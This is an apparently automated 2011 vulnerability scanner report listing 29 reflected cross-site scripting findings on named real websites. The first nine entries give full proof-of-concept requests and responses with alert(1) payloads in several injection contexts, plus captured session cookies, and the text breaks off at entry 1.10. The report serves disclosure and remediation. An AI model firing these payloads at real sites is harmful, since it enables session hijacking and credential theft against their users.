XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10282011-01

Report generated by XSS.CX at Fri Oct 28 15:09:54 CDT 2011.


Loading

1. Cross-site scripting (reflected)

1.1. http://domains.googlesyndication.com/domainads/search [q parameter]

1.2. http://domains.googlesyndication.com/domainads/search [qry_lnk parameter]

1.3. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

1.4. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

1.5. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pmZoneId parameter]

1.6. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

1.7. https://sjobs.brassring.com/1033/ASP/TG/cim_jobdetail.asp [type parameter]

1.8. https://sjobs.brassring.com/1033/ASP/TG/cim_jobdetail.asp [type parameter]

1.9. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

1.10. http://t.tellapart.com/hif [p parameter]

1.11. http://tch415419.tch.www.quora.com/up/tchannel4/updates [callback parameter]

1.12. http://tch700182.tch.www.quora.com/up/tchannel3/updates [callback parameter]

1.13. http://wireless.amazon.com/alohaCartRequest [zip parameter]

1.14. http://www.diapers.com/buy [freetext parameter]

1.15. http://www.diapers.com/buy [freetext parameter]

1.16. http://www.gerberonline.com/category.aspx [name of an arbitrarily supplied request parameter]

1.17. http://www.scout.com/staticpages/www/24/wac/a.z [cfg parameter]

1.18. http://www.scout.com/staticpages/www/24/wac/a.z [cfg parameter]

1.19. http://www.scout.com/staticpages/www/24/wac/a.z [conf parameter]

1.20. http://www.scout.com/staticpages/www/24/wac/a.z [conf parameter]

1.21. http://www.scout.com/staticpages/www/24/wac/a.z [fromprefetch parameter]

1.22. http://www.scout.com/staticpages/www/24/wac/a.z [fromprefetch parameter]

1.23. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]

1.24. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]

1.25. http://www.sqlservercentral.com/Forums/Topic1189509-391-1.aspx [name of an arbitrarily supplied request parameter]

1.26. http://www1.winbuyer.com/umbraco/ImageGen.ashx [image parameter]

1.27. http://domains.googlesyndication.com/domainads/search [User-Agent HTTP header]

1.28. http://t.tellapart.com/tpv [Referer HTTP header]

1.29. http://www.scout.com/staticpages/www/24/wac/a.z [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 29 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://domains.googlesyndication.com/domainads/search [q parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://domains.googlesyndication.com
Path:   /domainads/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a6c4b<script>alert(1)</script>e9fbb5130ab was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainads/search?callback=_google_json_callback&output=js&client=dp-demandmedia10_js&domain_name=adquire.com&q=Quirea6c4b<script>alert(1)</script>e9fbb5130ab&channel=009001&qry_lnk=Quire&num=0&ad=a10n3&adext=as1%2Csr1&adrep=3&dt=1319053541365&u_tz=-300&u_his=0&u_h=1200&u_w=1920&frm=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: domains.googlesyndication.com

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Wed, 19 Oct 2011 19:45:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Disposition: inline
X-Content-Type-Options: nosniff
Server: domainserver
Content-Length: 8446
X-XSS-Protection: 1; mode=block

_google_json_callback(
{
"tm": 0.085305,
"callback": "_google_json_callback",
"output": "xml_no_dtd",
"client": "dp-demandmedia10_js",
"domain_name": "adquire.com",
"q": "Quirea6c4b<script>alert(1)</script>e9fbb5130ab",
"channel": "009001",
"qry_lnk": "Quire",
"num": "0",
"ad": "a10n3",
"adext": "as1,sr1",
"adrep": "3",
"dt": "1319053541365",
"u_tz": "-300",
"u_his": "0",
"u_
...[SNIP]...

1.2. http://domains.googlesyndication.com/domainads/search [qry_lnk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://domains.googlesyndication.com
Path:   /domainads/search

Issue detail

The value of the qry_lnk request parameter is copied into the HTML document as plain text between tags. The payload 7c385<script>alert(1)</script>7b7cdbc378 was submitted in the qry_lnk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domainads/search?callback=_google_json_callback&output=js&client=dp-demandmedia10_js&domain_name=adquire.com&q=Quire&channel=009001&qry_lnk=Quire7c385<script>alert(1)</script>7b7cdbc378&num=0&ad=a10n3&adext=as1%2Csr1&adrep=3&dt=1319053541365&u_tz=-300&u_his=0&u_h=1200&u_w=1920&frm=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: domains.googlesyndication.com

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Wed, 19 Oct 2011 19:45:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Disposition: inline
X-Content-Type-Options: nosniff
Server: domainserver
Content-Length: 1045
X-XSS-Protection: 1; mode=block

_google_json_callback(
{
"tm": 0.027917,
"callback": "_google_json_callback",
"output": "xml_no_dtd",
"client": "dp-demandmedia10_js",
"domain_name": "adquire.com",
"q": "Quire",
"channel": "009001",
"qry_lnk": "Quire7c385<script>alert(1)</script>7b7cdbc378",
"num": "0",
"ad": "a10n3",
"adext": "as1,sr1",
"adrep": "3",
"dt": "1319053541365",
"u_tz": "-300",
"u_his": "0",
"u_h": "1200",
"u_w": "1920",
"frm": "0",

...[SNIP]...

1.3. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69616'-alert(1)-'9309e177aaf was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame1284892853569616'-alert(1)-'9309e177aaf&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1716
Date: Wed, 19 Oct 2011 01:25:18 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:18 GMT; path=/
Set-Cookie: pubfreq_28535_24101_1164556507=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:18 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame1284892853569616'-alert(1)-'9309e177aaf" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=SW8AAHdvAAAlXgAAAAAAAAAAAAAAAAAAAAAAAAAAAABKkAAARQEAACwBAAD6AAAACQAAAAEAAAABAAAAOEFEMzkxNTQtOTd
...[SNIP]...

1.4. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a74'-alert(1)-'95e5c0fb09c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html71a74'-alert(1)-'95e5c0fb09c&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1716
Date: Wed, 19 Oct 2011 01:25:16 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:16 GMT; path=/
Set-Cookie: pubfreq_28535_24101_927002863=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:16 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
directAdId=36938&adServerOptimizerId=1&ranreq=0.34278702503070235&defaultReq=1&defaultedAdServerId=559&kadDefNetFreq=1&pageURL=http://ads.pubmatic.com/hosteddefaulttags/28489/28535/24101/559/adtag.html71a74'-alert(1)-'95e5c0fb09c">
...[SNIP]...

1.5. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pmZoneId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pmZoneId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8e2a'-alert(1)-'fe4cda61f05 was submitted in the pmZoneId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24103&kadwidth=728&kadheight=90&pmZoneId=azfamily.com_728x90a8e2a'-alert(1)-'fe4cda61f05&kbgColor=ffffff&ktextColor=000000&klinkColor=002E64&pageURL=http://www.king5.com/&frameName=http_www_king5_comkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A24%3A51&ranreq=0.4976927924435586&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x1062&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://www.king5.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:24:50 GMT
Content-Length: 1904
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:24:50 GMT; path=/
Set-Cookie: pubfreq_28535_24103_85091502=6-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:04:50 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 20-Oct-2011 01:24:50 GMT; path=/

document.write('<div id="http_www_king5_comkomli_ads_frame12848928535" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=SW8AAHdvAAAnXgAAAAAAAAAAA
...[SNIP]...
&kltstamp=1318987490&indirectAdId=0&adServerOptimizerId=4&ranreq=0.4976927924435586&kbgColor=00FF7F&kborderColor=00FF7F&klinkColor=NCOLOR&kurlColor=FF547C&ktextColor=DC143C&pmZoneId=azfamily.com_728x90a8e2a'-alert(1)-'fe4cda61f05&pageURL=http://www.king5.com/">
...[SNIP]...

1.6. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ae9'-alert(1)-'8adf6ed829a was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.3427870250307023587ae9'-alert(1)-'8adf6ed829a&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:25:22 GMT
Content-Length: 1716
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:21 GMT; path=/
Set-Cookie: pubfreq_28535_24101_1653497370=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:22 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
=24101&adServerId=325&kefact=0.850000&kpbmtpfact=0.000000&kadNetFrequecy=3&kadwidth=300&kadheight=250&kadsizeid=9&kltstamp=1318987522&indirectAdId=36938&adServerOptimizerId=1&ranreq=0.3427870250307023587ae9'-alert(1)-'8adf6ed829a&defaultReq=1&defaultedAdServerId=559&kadDefNetFreq=1&pageURL=http://ads.pubmatic.com/hosteddefaulttags/28489/28535/24101/559/adtag.html">
...[SNIP]...

1.7. https://sjobs.brassring.com/1033/ASP/TG/cim_jobdetail.asp [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sjobs.brassring.com
Path:   /1033/ASP/TG/cim_jobdetail.asp

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0cb"%3balert(1)//f7b7c0acb35 was submitted in the type parameter. This input was echoed as ca0cb";alert(1)//f7b7c0acb35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1033/ASP/TG/cim_jobdetail.asp?jobId=1411074&PartnerId=13746&SiteId=195&type=searchca0cb"%3balert(1)//f7b7c0acb35&JobReqLang=1&recordstart=1&codes=IND HTTP/1.1
Host: sjobs.brassring.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://jobs.ebaycareers.com/silicon-valley/tech-software-engineers/jobid1623351-senior-systems-administrator-(ebay)-jobs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tg_session_13746_5200=^fOvLBzdBZmMtAyTQGktCFgeFqr26bm_slp_rhc_Vi5MPvM3K2PHuy4ZDKpY8rez7qBeGRaJNHW6bpPMZ2lTZ_C_R__L_F_tUP3KvMhAMAJPND2XPVix75kc_slp_rhc_3vqP0=; tg_session=^yTMlaABzTRf3svFEAxV5nbF667H2pjyzeYtxHX/7BuRUsl1DWrcE7NfcI53RlJimej1fFA4_slp_rhc_Mimk_C_R__L_F_26AhhEAPOPgJPKAWXVWqhqTLabbMB4Y=; tg_session_13746_195=^yTMlaABzTRf3svFEAxV5nbF667H2pjyzeYtxHX/7BuRUsl1DWrcE7NfcI53RlJimej1fFA4_slp_rhc_Mimk_C_R__L_F_26AhhEAPOPgJPKAWXVWqhqTLabbMB4Y=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103788
Content-Type: text/html; Charset=UTF-8
P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE"
X-Powered-By: ASP.NET
Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure
Set-Cookie: tg_session_13746_195=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure
Date: Fri, 14 Oct 2011 19:35:01 GMT


<SCRIPT LANGUAGE="javascript">
var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you
...[SNIP]...
           if (strLocale == lngSiteLocale)
               {
                   openWindow11("/" + strLocale + "/asp/tg/GQLogin.asp?SID=^gemIFr0yz7Qk/HHmw74gmJV/30EMcKDpIpVG4JKSMUjokRpIU4jVBEjzlRm_slp_rhc_xgpw&fjd=true&referer=searchca0cb";alert(1)//f7b7c0acb35&gqid="+ arrGQIds[2] + "&jobinfo=__" + arrGQId[lngSelect-1] + "__&applycount=1&type=searchca0cb";alert(1)//f7b7c0acb35_jobdetail");
               }
               else
               {
                document.frmMassApply.GQID.value = a
...[SNIP]...

1.8. https://sjobs.brassring.com/1033/ASP/TG/cim_jobdetail.asp [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sjobs.brassring.com
Path:   /1033/ASP/TG/cim_jobdetail.asp

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e96"style%3d"x%3aexpression(alert(1))"896f6a37999 was submitted in the type parameter. This input was echoed as 65e96"style="x:expression(alert(1))"896f6a37999 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1033/ASP/TG/cim_jobdetail.asp?jobId=1411074&PartnerId=13746&SiteId=195&type=search65e96"style%3d"x%3aexpression(alert(1))"896f6a37999&JobReqLang=1&recordstart=1&codes=IND HTTP/1.1
Host: sjobs.brassring.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://jobs.ebaycareers.com/silicon-valley/tech-software-engineers/jobid1623351-senior-systems-administrator-(ebay)-jobs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tg_session_13746_5200=^fOvLBzdBZmMtAyTQGktCFgeFqr26bm_slp_rhc_Vi5MPvM3K2PHuy4ZDKpY8rez7qBeGRaJNHW6bpPMZ2lTZ_C_R__L_F_tUP3KvMhAMAJPND2XPVix75kc_slp_rhc_3vqP0=; tg_session=^yTMlaABzTRf3svFEAxV5nbF667H2pjyzeYtxHX/7BuRUsl1DWrcE7NfcI53RlJimej1fFA4_slp_rhc_Mimk_C_R__L_F_26AhhEAPOPgJPKAWXVWqhqTLabbMB4Y=; tg_session_13746_195=^yTMlaABzTRf3svFEAxV5nbF667H2pjyzeYtxHX/7BuRUsl1DWrcE7NfcI53RlJimej1fFA4_slp_rhc_Mimk_C_R__L_F_26AhhEAPOPgJPKAWXVWqhqTLabbMB4Y=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103954
Content-Type: text/html; Charset=UTF-8
P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE"
X-Powered-By: ASP.NET
Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure
Set-Cookie: tg_session_13746_195=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure
Date: Fri, 14 Oct 2011 19:34:58 GMT


<SCRIPT LANGUAGE="javascript">
var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you
...[SNIP]...
<form name="frmSearch" method="post" action="cim_searchresults.asp?ref=10142011153459&SID=^XAu7YJSy6wM15vti2Dcw/3QuMp84IEWJjuNIvWVftKW2AgflD5sjPb32hqpJWn2j&referer=search65e96"style="x:expression(alert(1))"896f6a37999">
...[SNIP]...

1.9. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f722b'%3balert(1)//753de77ed89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f722b';alert(1)//753de77ed89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?mm_pub=7335&custom=1:&f722b'%3balert(1)//753de77ed89=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.clearsaleing.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=-1

Response

HTTP/1.1 200 OK
Date: Fri, 14 Oct 2011 18:19:59 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=-1; expires=Fri, 14-Oct-2016 00:19:59 GMT; path=/; domain=.mmismm.com
Content-Length: 470
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?mm_pub=7335&custom=1%3A&f722b';alert(1)//753de77ed89=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'">
...[SNIP]...

1.10. http://t.tellapart.com/hif [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
